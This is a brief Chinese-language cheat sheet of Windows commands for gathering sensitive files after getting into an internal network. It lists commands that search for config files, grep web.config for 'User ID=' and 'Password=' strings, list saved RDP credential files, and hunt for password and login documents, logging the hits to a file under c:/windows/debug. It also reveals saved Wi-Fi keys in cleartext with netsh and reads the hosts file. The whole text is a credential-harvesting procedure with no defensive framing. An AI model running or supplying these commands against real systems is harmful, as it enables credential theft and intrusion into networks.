内网中敏感文件的搜集

递归查找有conf字符的文件路径：dir /a /s /b "网站目录\*conf*" > 1.txt
递归查找当前目录下的web.config文件：dir /b /s web.config
递归查找当前目录下的web.config文件中字符串具有"User ID=" 或者 "Password="的文件路径：findstr /c:"User ID=" /c:"Password=" /si web.config
查找rdp凭证文件：dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
递归查找D:/Data/目录下的敏感文件for /r D:/Data/ %i in (*account.docx,*pwd*.docx,*login*.docx,*login*.xls) do @echo %i >> c:/windows/debug/result.txt
查看当前系统已保存的无线名称 netsh wlan show profiles
查看指定无线的连接密码 netsh wlan show profile name="Tenda_48A460" key=clear
查看hosts文件 type C:\WINDOWS\System32\drivers\etc\hosts